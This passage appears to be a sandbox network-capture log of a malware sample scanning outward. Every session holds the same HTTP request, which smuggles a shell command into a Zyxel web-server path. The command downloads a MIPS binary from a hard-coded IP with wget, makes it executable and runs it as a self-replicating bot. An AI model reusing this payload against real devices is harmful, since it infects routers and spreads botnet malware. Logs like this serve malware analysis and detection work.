                                                Jan 12, 2024 18:16:04.046166897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                298192.168.2.23517641.31.141.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:05.050693989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                299192.168.2.2359998165.184.255.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:05.050751925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                300192.168.2.2335370132.31.182.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:05.050798893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                301192.168.2.235425639.69.158.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:05.050837040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                302192.168.2.235847467.72.227.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:05.050884962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                303192.168.2.2333540169.182.126.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:05.050925016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                304192.168.2.2352696189.46.17.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085397959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                305192.168.2.2359532103.48.227.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085433960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                306192.168.2.2357950131.62.35.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085450888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                307192.168.2.235401286.36.109.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085501909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                308192.168.2.2338906156.253.159.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085535049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                309192.168.2.236035096.186.240.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085588932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                310192.168.2.235134888.95.9.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085623026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                311192.168.2.235572219.173.71.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085655928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                312192.168.2.235472238.35.94.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085716009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                313192.168.2.2338172124.53.239.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085741043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                314192.168.2.235715066.51.27.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085764885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                315192.168.2.2349582183.88.156.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085823059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                316192.168.2.2339958207.188.239.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085867882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                317192.168.2.233627460.160.229.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085900068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                318192.168.2.233832223.46.25.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085933924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                319192.168.2.2357954153.84.125.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.085992098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                320192.168.2.23542701.4.131.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086030960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                321192.168.2.235616866.246.60.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086070061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                322192.168.2.2334518204.1.169.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086105108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                323192.168.2.2344722191.128.72.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086155891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                324192.168.2.2347650156.252.32.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086189032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                325192.168.2.2358806217.18.201.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086236954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                326192.168.2.2336748118.148.166.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086263895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                327192.168.2.235984665.36.145.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086293936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                328192.168.2.2355416115.2.71.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086350918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                329192.168.2.235216652.55.204.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086390018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                330192.168.2.2344556209.81.184.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086424112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                331192.168.2.2360260130.85.5.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086451054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                332192.168.2.236023462.204.5.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086498976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                333192.168.2.2357708139.89.195.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086523056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                334192.168.2.2352392160.42.102.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086582899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                335192.168.2.2336536161.232.165.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086591005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                336192.168.2.2352796190.128.117.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086646080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                337192.168.2.2336084183.90.169.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086671114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                338192.168.2.233593425.142.129.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086720943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                339192.168.2.2342134156.143.206.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086754084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                340192.168.2.234045090.45.254.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086781979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                341192.168.2.2356736106.94.101.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086815119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                342192.168.2.2359554122.98.153.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086864948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                343192.168.2.235161093.176.113.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086901903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                344192.168.2.2353226203.66.56.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086945057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                345192.168.2.2338178198.61.149.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.086992025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                346192.168.2.2340960122.183.21.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087042093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                347192.168.2.2343494108.193.111.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087061882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                348192.168.2.2351968176.90.12.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087091923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                349192.168.2.2360496120.92.7.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087138891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                350192.168.2.234323894.39.79.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087187052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                351192.168.2.2353618211.19.33.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087214947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                352192.168.2.2345888141.185.184.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087255955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                353192.168.2.234029053.12.198.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087291956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                354192.168.2.2357554101.98.143.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087323904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                355192.168.2.2344126212.223.206.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087363005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                356192.168.2.235280032.85.238.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087419987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                357192.168.2.2333494197.212.7.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087467909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                358192.168.2.2348662107.171.255.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087512970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                359192.168.2.2341376197.114.16.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087532043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                360192.168.2.2345794185.178.38.4443
                                                TimestampBytes transferredDirectionData
